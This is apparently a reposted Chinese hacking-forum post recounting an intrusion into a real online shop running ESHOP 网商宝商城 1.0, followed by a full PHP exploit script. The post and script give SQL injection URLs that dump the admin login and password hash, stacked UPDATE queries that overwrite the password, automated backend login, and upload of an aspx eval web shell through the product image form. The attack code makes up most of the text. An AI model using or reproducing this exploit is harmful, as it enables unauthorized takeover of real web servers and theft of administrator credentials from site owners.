某天起床比较晚,起来发现地上有传单。

看了下是个网店。

于是想看看用的什么程序,找了下(看html注释,css注释,文件名)。发现是ESHOP网商宝商城。

google下漏洞,发现有eshop的漏洞,测试了下,不对啊。不过还是报错了。结果发现有其他的网店系统叫ESHOP。

放了两天,然后想起了再来测试下注入,它有过滤代码的。下了源码看了下。结果没有过滤select关键字。

在前台搜索处,价格从  到  哪里发现一处数字型注入点。

结合代码里找到的管理员表名和列名。然后就可以爆了。

http://xxxx.com/p_list.aspx?keyword=%&maxPrice=0&minPrice=0 and (select top 1 admin from admin)>0

// 第一个管理员的登录名

http://xxxx.com/p_list.aspx?keyword=%&maxPrice=0&minPrice=0 and (select top 1 password from admin)>0

//密码。标准md5的,大家懂的。

放注入的地方还没有过滤update。所以密码反查不出来,可以更新哦。还有一点,这个过滤代码只过滤了get方式的。

进入后台后。产品系统-》产品内容-》列表图片哪里可以直接传aspx文件。关于路径,直接传aspx不能显示路径,所以先直接传jpg的把路径搞到手,再传aspx的就KO了。

打完收工。

PS:监测而已,不搞破坏的。

<?php
	print_r('
	+—————————————————————————+
	ESHOP 网商宝商城 1.0 GetWebshell Exploit    By: vccjis[S.Y.C]
	Team : Www.MyClover.Org Www.InsiGht-Labs.org
	Data : 2012.4.22
	+—————————————————————————+
	'."\r\n");
	if ($argc < 3)
	{
	print_r('
	+++++++++++++++++++++++++++++++++++++++++++++++++++++
	
	Usage: php '.$argv[0].' Host Port Path 
	Example:
	php '.$argv[0].' localhost 80 /
	
	+++++++++++++++++++++++++++++++++++++++++++++++++++++
	');
	exit();
	}
	$host = $argv[1];
	$port = $argv[2];
	$path = $argv[3];
	
	$content = "xxoo";
	$cookie = "Cookie: ASP.NET_SessionId=ovsnh045kuxv3s45lvmbbi55";
	$type = "Content-Type: application/x-www-form-urlencoded";
	
	if ($argc == 5)
	{
		if ($argv[4] == "god")
		{
			echo "update adminname and password\n\r";
			$url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20real_name=admin%2bpassword%20where%20Id=1; HTTP/1.1';
			$recvdata = SendData($host, $port, $url, $content, $cookie, $type);
			$url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20admin=0x61646D696E,password=0x6531306164633339343962613539616262653536653035376632306638383365%20where%20Id=1; HTTP/1.1';
			$recvdata = SendData($host, $port, $url, $content, $cookie, $type);
			echo "!!!\r\n";
			echo "go /manager the get webshell\r\n"; 
			echo "the product content》add a list of pictures》to upload the aspx file\r\n";
			echo "it is necessary the original account password recovery, account password in the admin table real_name field.\r\n";
			echo "adminname:admin\r\n";
			echo "password:123456\r\n";
			exit();
		}
	}

	$url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0%20and%20(select%20top%201%20admin%20from%20admin)%3E0 HTTP/1.1';
	$recvdata = SendData($host, $port, $url, $content, $cookie, $type);
	$tempdata = "";

	if (preg_match("/\'.*\'/", $recvdata, $tempdata) == 0)
	{
		echo "\r\nget adminname error";
		exit();	
	}
	$adminname = str_replace('\'', '', $tempdata[0]);

	
	$url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0%20and%20(select%20top%201%20password%20from%20admin)%3E0 HTTP/1.1';
	$recvdata = SendData($host, $port, $url, $content, $cookie, $type);
	$tempdata = "";
	preg_match("/\'.*\'/", $recvdata, $tempdata);
	$password = str_replace('\'', '', $tempdata[0]);
	
	echo "adminname:".$adminname."\r\n";
	echo "adminpass:".$password."\r\n";

	$hexadminname = SetToHexString($adminname);
	$hexpassword = SetToHexString($password);
	
	$url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20password=0x6531306164633339343962613539616262653536653035376632306638383365%20where%20admin=0x'.$hexadminname.'; HTTP/1.1';
	SendData($host, $port, $url, $content, $cookie, $type);

	$url = "GET ".$path."/back-login.aspx HTTP/1.1";
	$recvdata = SendData($host, $port, $url, $content, $cookie, $type);
	$tempdata = "";
	$VIEWSTATE = "";
	$EVENTVALIDATION = "";
	
	if (preg_match("/__VIEWSTATE\" va.*\" \/>/", $recvdata, $tempdata) == 0)
	{
		echo "\r\nlogin error";
		exit();
	}
	preg_match("/\/.*\"/", $tempdata[0],  $VIEWSTATE);
	$VIEWSTATE[0] = str_replace('"', '', $VIEWSTATE[0]);
 
	$tempdata = "";
	preg_match("/__EVENTVALIDATION\" va.*\" \/>/", $recvdata, $tempdata);
	preg_match("/\/.*\"/", $tempdata[0],  $EVENTVALIDATION);
	$EVENTVALIDATION[0] = str_replace('"', '', $EVENTVALIDATION[0]);

	$tempdate = "";
	preg_match("/ASP.NET_SessionId.*;/", $recvdata, $tempdata);
	$cookie = "Cookie: ASP.NET_SessionId=ovsnh045kuxv3s45lvmbbi55";
	
	$content = "__VIEWSTATE=".urlencode($VIEWSTATE[0])."&&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=".urlencode($EVENTVALIDATION[0])."&txtUserName=admin&txtPassword=123456&button=%C2%A0%C2%A0\r\n";
	$content = "__VIEWSTATE=".urlencode($VIEWSTATE[0])."&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=".urlencode($EVENTVALIDATION[0])."&txtUserName=".$adminname."&txtPassword=123456&button=%C2%A0dfg%C2%A0\r\n\r\n";
	$url = "POST ".$path."/back-login.aspx HTTP/1.1";
	$recvdata = SendData($host, $port, $url, $content, $cookie, $type);

	$tempdata = "";
	if (preg_match("/Cookie:.*;/", $recvdata, $tempdata) == 0)
	{
		echo "\r\nlogin error";
		exit();
	}
	 
	$cookie = $tempdata[0]." ASP.NET_SessionId=ovsnh045kuxv3s45lvmbbi55";
	$recvdata = SendData($host, $port, "GET ".$path."/manager/product_detail.aspx HTTP/1.1", "", $cookie, $type);
	$tempdata = "";
	$VIEWSTATE = "";
	$EVENTVALIDATION = "";
	if (preg_match("/__VIEWSTATE\" va.*\" \/>/", $recvdata, $tempdata) == 0)
	{
		echo "\r\nNo /manager";
		exit();
	}
	preg_match("/\/.*\"/", $tempdata[0],  $VIEWSTATE);
	$VIEWSTATE[0] = str_replace('"', '', $VIEWSTATE[0]);
 
	$tempdata = "";
	preg_match("/__EVENTVALIDATION\" va.*\" \/>/", $recvdata, $tempdata);
	preg_match("/\/.*\"/", $tempdata[0],  $EVENTVALIDATION);
	$EVENTVALIDATION[0] = str_replace('"', '', $EVENTVALIDATION[0]);
		
	$content = '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTTARGET"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTARGUMENT"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__LASTFOCUS"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__VIEWSTATE"

';
	$content .= $VIEWSTATE[0]."\r\n";///wEPDwUJODI1MTc5NTgyD2QWAmYPZBYMAgMPFgIeBFRleHQFEDIwMTItMDQtMjIgMTE6NTFkAgUPFgIfAAUP6LaF57qn566h55CG5ZGYZAIHDxYCHwAFDuaCqOWlve+8mmFkbWluZAIJDxYCHgtfIUl0ZW1Db3VudAIFFgpmD2QWAmYPFQMHcHJvZHVjdAdwcm9kdWN0DOS6p+WTgeezu+e7n2QCAQ9kFgJmDxUDB2FydGljbGUHYXJ0aWNsZQzmlofnq6Dns7vnu59kAgIPZBYCZg8VAwVvcmRlcgVvcmRlcgzorqLljZXns7vnu59kAgMPZBYCZg8VAwZtZW1iZXIGbWVtYmVyDOS8muWRmOeuoeeQhmQCBA9kFgJmDxUDBnN5c3RlbQZzeXN0ZW0M57O757uf566h55CGZAILDxYCHwECBRYKZg9kFgRmDxUBB3Byb2R1Y3RkAgEPFgIfAQIFFgpmD2QWAmYPFQMQcHJvZHVjdF9jYXRlZ29yeRBwcm9kdWN0X2NhdGVnb3J5DOS6p+WTgeebruW9lWQCAQ9kFgJmDxUDEmNhdGVnb3J5X2F0dHJpYnV0ZRJjYXRlZ29yeV9hdHRyaWJ1dGUM55uu5b2V5bGe5oCnZAICD2QWAmYPFQMPcHJvZHVjdF9jb250ZW50D3Byb2R1Y3RfY29udGVudAzkuqflk4HlhoXlrrlkAgMPZBYCZg8VAw1wcm9kdWN0X2JyYW5kDXByb2R1Y3RfYnJhbmQM5Lqn5ZOB5ZOB54mMZAIED2QWAmYPFQMPcHJvZHVjdF9jb21tZW50D3Byb2R1Y3RfY29tbWVudAzkuqflk4Hor4TorrpkAgEPZBYEZg8VAQdhcnRpY2xlZAIBDxYCHwECCBYQZg9kFgJmDxUDBG5ld3MEbmV3cwzmlrDpl7vliqjmgIFkAgEPZBYCZg8VAwRoZWxwBGhlbHAM5Zyo57q/5biu5YqpZAICD2QWAmYPFQMQd2Vic2l0ZV9zaXRlcG9zdBB3ZWJzaXRlX3NpdGVwb3N0DOe9keermeWFrOWRimQCAw9kFgJmDxUDDnNlY3JldF9wcm90ZWN0DnNlY3JldF9wcm90ZWN0DOmakOengeS/neaKpGQCBA9kFgJmDxUDDWxhd19zdGF0ZW1lbnQNbGF3X3N0YXRlbWVudBLmlL/nrZbms5Xlvovlo7DmmI5kAgUPZBYCZg8VAwdyZWNydWl0B3JlY3J1aXQM5Zyo57q/5oub6IGYZAIGD2QWAmYPFQMSaW50ZWdyYXRlX3B1cmNoYXNlEmludGVncmF0ZV9wdXJjaGFzZQzlm6LotK3kuJPljLpkAgcPZBYCZg8VAwxuZXdzX3JlY3ljbGUMbmV3c19yZWN5Y2xlCeWbnuaUtuermWQCAg9kFgRmDxUBBW9yZGVyZAIBDxYCHwECBRYKZg9kFgJmDxUDBW9yZGVyBW9yZGVyBuiuouWNlWQCAQ9kFgJmDxUDD3Nob3BwaW5nX21ldGhvZA9zaG9wcGluZ19tZXRob2QM6YCB6LSn5pa55byPZAICD2QWAmYPFQMOcGF5bWVudF9tZXRob2QOcGF5bWVudF9tZXRob2QM5LuY5qy+5pa55byPZAIDD2QWAmYPFQMNc2hvcHBpbmdfZGF0ZQ1zaG9wcGluZ19kYXRlDOmAgei0p+aXtumXtGQCBA9kFgJmDxUDDG9yZGVyX3N0YXR1cwxvcmRlcl9zdGF0dXMM6K6i5Y2V54q25oCBZAIDD2QWBGYPFQEGbWVtYmVyZAIBDxYCHwECBBYIZg9kFgJmDxUDC21lbWJlcl9pbmZvC21lbWJlcl9pbmZvDOS8muWRmOeuoeeQhmQCAQ9kFgJmDxUDDG1lbWJlcl9sZXZlbAxtZW1iZXJfbGV2ZWwM5Lya5ZGY57qn5YirZAICD2QWAmYPFQMOb25saW5lX21lc3NhZ2UOb25saW5lX21lc3NhZ2UM5Zyo57q/5Y+N6aaIZAIDD2QWAmYPFQMIZmF2b3JpdGUIZmF2b3JpdGUJ5pS26JeP5aS5ZAIED2QWBGYPFQEGc3lzdGVtZAIBDxYCHwECAhYEZg9kFgJmDxUDCmFkbWluX2xpc3QKYWRtaW5fbGlzdAznrqHnkIbnmbvlvZVkAgEPZBYCZg8VAwRyb2xlBHJvbGUM6KeS6Imy566h55CGZAIND2QWAmYPFgIeB2VuY3R5cGUFE211bHRpcGFydC9mb3JtLWRhdGEWEGYPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwNoZGQCBA8PFgIfA2hkZAIKDxBkEBUGDS0t6K+36YCJ5oupLS0P5b+D55CG5YGl5bq357G7CeWwj+ivtOexuw/ouqvkvZPkv53lgaXnsbsP5oiQ6ZW/5Yqx5b+X57G7D+Wls+aAp+ivu+eJqeexuxUGATABMQEyATMBNAE1FCsDBmdnZ2dnZxYBZmQCCw8QZGQWAWZkAiQPDxYCHwNoZGQCJw8PFgIfA2hkZAIoDw8WAh8DaGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYHBSNjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJGNoa0lzU2hvdwUoY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRjaGtJc1JlY29tbWVudAUmY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRjaGtJc0NvbW1lbnQFImN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkY2hrSXNIb3QFImN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkY2hrSXNOZXcFJ2N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkY2hrSXNEaXNjb3VudAUmY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRjaGtJc0RlZmF1bHRMDeHTq5UFawIyhVsczTwNYNAfyw==
	$content .= '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTVALIDATION"

';
	$content .= $EVENTVALIDATION[0]."\r\n";///wEWJwKs5v06Atqk0q0LAqiR6t4KAp6y8rMBAqKKxtACAsHKosgDAruSn4INAvvs89EPAoim8JICApjJ2vwOAofJ2vwOAobJ2vwOAoXJ2vwOAoTJ2vwOAoPJ2vwOAsWeztoBAtXx5LQNAvLf/5UFAvbTvuwMAqP8+4wOArWL1rkIArOYgK0OAuT2yp4BAtr2xvsMAqjJ1JIOApmbyKgEAu27qeUIAp7KhdUMAt/A1eoLAorU36cKAqyP95gBAvPv2FMCo5i5SQKW9+GSCQLKz7OlDALtheC3DwK87PLABgKokaLfCgKesorLBNFtpcfh8T+rQvlfSsD5CYiQmB8C
	$content .= '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtProductName"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtOrderBy"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtStock"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSaleNumber"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlSecondCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlThirdCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlBrand"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsShow"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsComment"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsNew"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtPrice"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSalePrice"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtIntegral"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$hiddenImage"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$hiddenImageId"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuUploadList"; filename="asd.aspx"
Content-Type: application/octet-stream

<%'."@".' Page Language="Jscript"%><%eval(Request.Item["fun"],"unsafe");%>
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$btnUploadList"

......
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuDetailImage"; filename=""


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuDetailZoomImage"; filename=""


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtKeywords"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSummary"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtContent"


------------EwwmsGcmNCcEdWawAUBSNx--';
	
	$type = "Content-Type: multipart/form-data; boundary=----------EwwmsGcmNCcEdWawAUBSNx";//"Content-Type: multipart/form-data; boundary=----------FhmN6QFkeZCWDWoYR7K01F";
	$recvdata = SendData($host, $port, "POST ".$path."/manager/product_detail.aspx HTTP/1.1", $content, $cookie, $type);
	$tempdata = "";
	preg_match("/upload-file\/images\/product.*\.aspx/", $recvdata, $tempdata);
	$url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20password=0x'.$hexpassword.'%20where%20admin=0x'.$hexadminname.'; HTTP/1.1';
	SendData($host, $port, $url, $content, $cookie, $type);
	
	echo "\r\nwebshell:http://$host/".$tempdata[0]."\r\n";
	
function SendData($host, $port, $url, $content, $cookie, $type)
{
	$data = $url."\r\n";
	$data .= "Referer: http://$host/\r\n";
	$data .= $type."\r\n";
	$data .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
	$data .= "User-Agent: Opera/9.80 (Windows NT 5.2; U; zh-cn) Presto/2.10.229 Version/11.62\r\n";
	$data .= "Host: $host\r\n";
	$data .= "Content-Length: ".strlen($content)."\r\n";
	$data .= "Accept-Encoding: gzip, deflate\r\n";
	$data .= "Connection: Close\r\n";
	$data .= $cookie."\r\n\r\n";
	$data .= $content;
	$ock=fsockopen($host,$port);
	if (!$ock) 
	{
		echo "No response from host\n";
	}
	fwrite($ock,$data);
	$recvdata = "";
	while (!feof($ock)) 
	{
		$exp=fgets($ock, 1024);
		$recvdata .= $exp;
	}
	fclose($ock);
	return $recvdata;
}
function SingleDecToHex($dec)
{
    $tmp="";
    $dec=$dec%16;
    if($dec<10)
        return $tmp.$dec;
    $arr=array("a","b","c","d","e","f");
    return $tmp.$arr[$dec-10];
}

function SetToHexString($str)
{
    if(!$str)return false;
    $tmp="";
    for($i=0;$i<strlen($str);$i++)
    {
        $ord=ord($str[$i]);
        $tmp.=SingleDecToHex(($ord-$ord%16)/16);
        $tmp.=SingleDecToHex($ord%16);
    }
    return $tmp;
}
?>

转自:http://www.90sec.org/thread-2156-1-1.html